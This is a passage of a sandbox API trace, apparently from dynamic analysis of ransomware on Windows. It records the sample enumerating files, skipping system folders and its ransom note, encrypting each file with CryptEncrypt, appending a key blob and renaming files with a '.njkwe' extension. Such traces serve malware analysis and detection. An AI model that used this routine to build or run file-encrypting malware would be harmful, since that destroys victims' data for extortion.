[0079.508] GetProcessHeap () returned 0xbe0000 [0079.508] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0079.508] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.508] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0079.508] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0079.508] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0079.508] CloseHandle (hObject=0x43c) returned 1 [0079.508] GetProcessHeap () returned 0xbe0000 [0079.508] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0079.508] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\433__Connections_Cellular_Chunghwa (Taiwan)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 181 [0079.508] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\433__Connections_Cellular_Chunghwa (Taiwan)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\433__connections_cellular_chunghwa (taiwan)_i1$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\433__Connections_Cellular_Chunghwa (Taiwan)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\433__connections_cellular_chunghwa (taiwan)_i1$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0079.509] GetProcessHeap () returned 0xbe0000 [0079.509] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0079.509] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90fd7b44, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90fd7b44, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90fd7b44, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x27f, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="434__Connections_Cellular_MoBiTai (Taiwan)_i0$(__MVID)@WAP.provxml", cAlternateFileName="434__C~1.PRO")) returned 1 [0079.509] lstrcmpiW (lpString1="434__Connections_Cellular_MoBiTai (Taiwan)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0079.509] lstrcmpiW (lpString1="434__Connections_Cellular_MoBiTai (Taiwan)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0079.509] lstrcmpiW (lpString1="434__Connections_Cellular_MoBiTai (Taiwan)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0079.509] lstrcmpiW (lpString1="434__Connections_Cellular_MoBiTai (Taiwan)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0079.509] lstrcmpiW (lpString1="434__Connections_Cellular_MoBiTai (Taiwan)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0079.509] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\434__Connections_Cellular_MoBiTai (Taiwan)_i0$(__MVID)@WAP.provxml") returned 160 [0079.509] StrStrIW (lpFirst="434__Connections_Cellular_MoBiTai (Taiwan)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0079.509] lstrcmpW (lpString1="434__Connections_Cellular_MoBiTai (Taiwan)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0079.509] lstrcmpW (lpString1="434__Connections_Cellular_MoBiTai (Taiwan)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0079.509] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\434__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0079.509] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\434__Connections_Cellular_MoBiTai (Taiwan)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\434__connections_cellular_mobitai (taiwan)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0079.510] GetTickCount () returned 0x1154320 [0079.510] GetTickCount () returned 0x1154320 [0079.510] GetTickCount () returned 0x1154320 [0079.510] GetTickCount () returned 0x1154320 [0079.510] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0079.510] GetProcessHeap () returned 0xbe0000 [0079.510] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0079.510] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x27f, lpOverlapped=0x0) returned 1 [0079.511] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd81, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.512] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x27f, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x27f, lpOverlapped=0x0) returned 1 [0079.512] GetProcessHeap () returned 0xbe0000 [0079.512] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0079.512] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.512] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0079.512] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0079.512] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0079.512] CloseHandle (hObject=0x43c) returned 1 [0079.512] GetProcessHeap () returned 0xbe0000 [0079.512] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0079.512] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\434__Connections_Cellular_MoBiTai (Taiwan)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 180 [0079.512] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\434__Connections_Cellular_MoBiTai (Taiwan)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\434__connections_cellular_mobitai (taiwan)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\434__Connections_Cellular_MoBiTai (Taiwan)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\434__connections_cellular_mobitai (taiwan)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0079.513] GetProcessHeap () returned 0xbe0000 [0079.513] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0079.513] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90fd7b44, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90fd7b44, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90fd7b44, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2cb, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="435__Connections_Cellular_Taiwan Mobile (Taiwan)_i0$(__MVID)@WAP.provxml", cAlternateFileName="435__C~1.PRO")) returned 1 [0079.513] lstrcmpiW (lpString1="435__Connections_Cellular_Taiwan Mobile (Taiwan)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0079.513] lstrcmpiW (lpString1="435__Connections_Cellular_Taiwan Mobile (Taiwan)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0079.513] lstrcmpiW (lpString1="435__Connections_Cellular_Taiwan Mobile (Taiwan)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0079.513] lstrcmpiW (lpString1="435__Connections_Cellular_Taiwan Mobile (Taiwan)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0079.513] lstrcmpiW (lpString1="435__Connections_Cellular_Taiwan Mobile (Taiwan)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0079.513] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\435__Connections_Cellular_Taiwan Mobile (Taiwan)_i0$(__MVID)@WAP.provxml") returned 166 [0079.513] StrStrIW (lpFirst="435__Connections_Cellular_Taiwan Mobile (Taiwan)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0079.513] lstrcmpW (lpString1="435__Connections_Cellular_Taiwan Mobile (Taiwan)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0079.513] lstrcmpW (lpString1="435__Connections_Cellular_Taiwan Mobile (Taiwan)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0079.513] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\435__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0079.513] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\435__Connections_Cellular_Taiwan Mobile (Taiwan)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\435__connections_cellular_taiwan mobile (taiwan)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0079.514] GetTickCount () returned 0x115432f [0079.514] GetTickCount () returned 0x115432f [0079.514] GetTickCount () returned 0x115432f [0079.514] GetTickCount () returned 0x115432f [0079.514] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0079.514] GetProcessHeap () returned 0xbe0000 [0079.514] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0079.514] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x2cb, lpOverlapped=0x0) returned 1 [0079.515] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd35, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.515] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x2cb, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x2cb, lpOverlapped=0x0) returned 1 [0079.515] GetProcessHeap () returned 0xbe0000 [0079.515] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0079.515] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.515] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0079.515] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0079.516] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0079.516] CloseHandle (hObject=0x43c) returned 1 [0079.516] GetProcessHeap () returned 0xbe0000 [0079.516] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0079.516] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\435__Connections_Cellular_Taiwan Mobile (Taiwan)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 186 [0079.516] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\435__Connections_Cellular_Taiwan Mobile (Taiwan)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\435__connections_cellular_taiwan mobile (taiwan)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\435__Connections_Cellular_Taiwan Mobile (Taiwan)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\435__connections_cellular_taiwan mobile (taiwan)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0079.516] GetProcessHeap () returned 0xbe0000 [0079.516] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0079.517] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90fd7b44, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90fd7b44, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90fd7b44, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x1f2, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="436__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml", cAlternateFileName="436__C~1.PRO")) returned 1 [0079.517] lstrcmpiW (lpString1="436__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml", lpString2="Windows") returned -1 [0079.517] lstrcmpiW (lpString1="436__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml", lpString2="$Recycle.bin") returned 1 [0079.517] lstrcmpiW (lpString1="436__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml", lpString2="System Volume Information") returned -1 [0079.517] lstrcmpiW (lpString1="436__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml", lpString2="Program Files") returned -1 [0079.517] lstrcmpiW (lpString1="436__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml", lpString2="Program Files (x86)") returned -1 [0079.517] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\436__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml") returned 162 [0079.517] StrStrIW (lpFirst="436__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml", lpSrch=".njkwe") returned 0x0 [0079.517] lstrcmpW (lpString1="436__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0079.517] lstrcmpW (lpString1="436__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml", lpString2="taridd") returned -1 [0079.517] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\436__Cellular", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0079.517] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\436__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\436__cellular_persimsettings_$(__iccid)_accountexperienceurl.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0079.517] GetTickCount () returned 0x115432f [0079.517] GetTickCount () returned 0x115432f [0079.517] GetTickCount () returned 0x115432f [0079.517] GetTickCount () returned 0x115432f [0079.517] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0079.517] GetProcessHeap () returned 0xbe0000 [0079.517] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0079.517] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x1f2, lpOverlapped=0x0) returned 1 [0079.519] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffe0e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.519] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x1f2, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x1f2, lpOverlapped=0x0) returned 1 [0079.519] GetProcessHeap () returned 0xbe0000 [0079.519] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0079.519] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.519] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0079.519] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0079.519] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0079.520] CloseHandle (hObject=0x43c) returned 1 [0079.520] GetProcessHeap () returned 0xbe0000 [0079.520] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0079.520] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\436__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml_r00t_{3sXlE5}.njkwe") returned 182 [0079.520] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\436__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\436__cellular_persimsettings_$(__iccid)_accountexperienceurl.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\436__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\436__cellular_persimsettings_$(__iccid)_accountexperienceurl.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0079.520] GetProcessHeap () returned 0xbe0000 [0079.520] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0079.520] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90fd7b44, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90fd7b44, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90fd7b44, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x284, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="437__Connections_Cellular_TransAsia (Taiwan)_i0$(__MVID)@WAP.provxml", cAlternateFileName="437__C~1.PRO")) returned 1 [0079.521] lstrcmpiW (lpString1="437__Connections_Cellular_TransAsia (Taiwan)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0079.521] lstrcmpiW (lpString1="437__Connections_Cellular_TransAsia (Taiwan)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0079.521] lstrcmpiW (lpString1="437__Connections_Cellular_TransAsia (Taiwan)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0079.521] lstrcmpiW (lpString1="437__Connections_Cellular_TransAsia (Taiwan)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0079.521] lstrcmpiW (lpString1="437__Connections_Cellular_TransAsia (Taiwan)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0079.521] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\437__Connections_Cellular_TransAsia (Taiwan)_i0$(__MVID)@WAP.provxml") returned 162 [0079.521] StrStrIW (lpFirst="437__Connections_Cellular_TransAsia (Taiwan)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0079.521] lstrcmpW (lpString1="437__Connections_Cellular_TransAsia (Taiwan)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0079.521] lstrcmpW (lpString1="437__Connections_Cellular_TransAsia (Taiwan)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0079.521] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\437__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0079.521] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\437__Connections_Cellular_TransAsia (Taiwan)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\437__connections_cellular_transasia 